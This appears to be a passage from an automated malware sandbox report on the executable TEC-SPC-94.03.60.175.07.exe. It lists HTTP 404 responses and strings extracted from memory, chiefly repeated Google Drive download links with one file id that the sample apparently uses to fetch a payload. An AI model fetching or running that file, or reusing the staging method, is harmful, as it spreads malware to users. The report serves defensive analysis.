ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6n--IN87so5snPV0lzFrTxOgZ3H-N-WcX8BWY7oqvmqyjaiOFvT-ucHkMPrltomvT9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:07 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-y3DZUCCGOp_7mkiYWAKEuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WtiB1oje2811J_yZ9tVZUUwQnGXJ6W4T96k0HN-gBOEZlQMKOQ8rvcBNam8DI121KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:12 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-OoBlue0n3HAxx7RpMXxZNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rInwiGldG2Eu4HdI1VJvgvpuwtGPGOCfVZD7iFbmBHqwSKXW5jpW_K4izTliwLvdRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-NCCqdR7YFhYK_Uln0jJpgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: TEC-SPC-94.03.60.175.07.exe, 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000000.00000000.2244470500.0000000000409000.00000008.00000001.01000000.00000003.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000000.2349658011.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=d
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068E3000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Gj
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564228643.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564290457.0000000006931000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618278295.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2848978073.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591570231.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/gjh
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=do
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.0000000006908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-.
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.0000000006909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-6
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.0000000006909000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3069029296.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.0000000006909000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764596267.000000000690B000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-:
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3069029296.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2930905111.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-P
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-V
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-b
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3340844368.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3286823656.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-miFE834NBt4YyP-
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3340844368.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3286823656.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-miFE834NBt4YyP-f6F
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-miFE834NBt4YyP-z
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.0000000006909000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.0000000006909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-n
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2848978073.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2930905111.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-ssionKeyBackward&
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.0000000006909000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.0000000006909000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764596267.000000000690B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-v
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764596267.000000000690B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-z
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3069029296.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2848978073.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2930905111.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/wjx
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3069029296.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564228643.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3314199552.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564290457.0000000006931000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618278295.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3340844368.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2510326046.000000000695A000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.0000000006974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0E
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3096442008.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.0000000006973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/N9p5ty5miFE834NBt4YyP-e
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download$
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download/
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download6s
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadC1
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadG
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadR
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068E3000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadRY
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068E3000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadXX
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618278295.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadca
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068E3000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloade
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068E3000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadjY
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadon
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564228643.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564290457.0000000006931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloads9
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloadu
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=downloady1
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3314199552.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3232423623.0000000006970000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3260063023.0000000006970000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.0000000006973000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/hE
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
